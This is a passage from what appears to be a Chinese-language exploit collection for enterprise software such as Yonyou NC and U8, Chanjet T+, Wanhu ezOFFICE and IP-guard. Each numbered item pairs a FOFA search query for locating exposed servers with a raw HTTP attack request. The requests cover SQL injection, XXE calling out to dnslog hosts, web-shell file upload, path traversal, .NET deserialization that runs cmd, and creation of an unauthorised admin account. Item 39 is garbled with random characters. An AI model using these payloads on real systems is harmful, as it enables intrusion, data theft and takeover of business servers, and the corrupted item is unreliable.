User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. 用友NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. 用友NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. 用友NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. 用友NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. 用友U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

8 C$ b" ?5 q. I) ]& {( [4 f8 l39. 用友U8 Cloud RegisterServlet SQL注入% l) v: k: J/ x: _) K' i+ X8 L
FOFA:title="u8c"
6 W9 E/ e3 \6 M HPOST /servlet/RegisterServlet HTTP/1.1) A2 [7 C5 T% ?4 k; E
Host: 192.168.86.128:8089
7 B2 s* X6 W* S h& A3 f' |2 JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
' q7 ?9 |' H5 F9 v3 b6 F# kConnection: close
% h. x7 l, M0 Y' h" cContent-Length: 85
H3 [$ b, J4 s2 I( y d5 vAccept: */*
+ H, d/ ~1 l0 WAccept-Language: en1 n3 O$ _; d: c! b5 r( E
Content-Type: application/x-www-form-urlencoded1 i' j/ E1 X; z$ U0 k
X-Forwarded-For: 127.0.0.1) d$ q( u' g* _+ f, u
Accept-Encoding: gzip
1 {( w! A. i2 D6 [( V& a4 i. b$ p7 r3 I$ ^/ R3 h. w; _
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0-- Y3 E; K2 U6 h( O0 m
4 ~2 {8 O& I2 Q8 `+ ^+ P; H
40. 用友U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. 用友GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
  <soapenv:Header/>
  <soapenv:Body>
    <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
    </ser:getUserNameById>
  </soapenv:Body>
</soapenv:Envelope>

44. 用友GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. 用友GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. 用友GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. 用友GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. 用友U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. 用友U8 CRM system uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. 泛微 E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. 迪普 DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. 畅捷通T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. 畅捷通T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword interface.
Step 2: using the obtained Cookie, request /tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. 畅捷通T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. 畅捷通T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then access:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
  <GetOSpById xmlns="http://tempuri.org/">
    <sId>1';waitfor delay '0:0:5'--+</sId>
  </GetOSpById>
</soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云一脸通 smart management platform 1.0.55.0.0.1 privilege bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Lines 42 and 43 of the response containing the string 6cfe798ba8e5b85feb50164c59f4bec9 confirm that the vulnerability is present

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, dir gives the path it is written to, and fileType gives the file type
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

